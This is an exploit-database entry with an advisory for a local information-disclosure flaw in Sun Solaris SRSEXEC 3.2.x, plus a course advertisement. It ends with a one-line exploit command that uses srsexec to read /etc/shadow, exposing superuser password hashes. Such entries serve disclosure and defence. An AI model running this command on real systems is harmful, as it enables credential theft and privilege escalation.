Sun Microsystems Solaris SRSEXEC 3.2.x - Arbitrary File Read Local Information Disclosure

EDB-ID:

30021


Author:

anonymous

Type:

local


Platform:

Solaris

Date:

2007-05-10


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

source: https://www.securityfocus.com/bid/23915/info

Sun Microsystems Solaris is prone to a local information-disclosure vulnerability due to a design error.

A local attacker may exploit this issue to access sensitive information, including superuser password information, that may lead to further attacks. A complete compromise is possible. 

The following exploit example is available:
$ /opt/SUNWsrspx/bin/srsexec -dvb /etc/shadow OWNED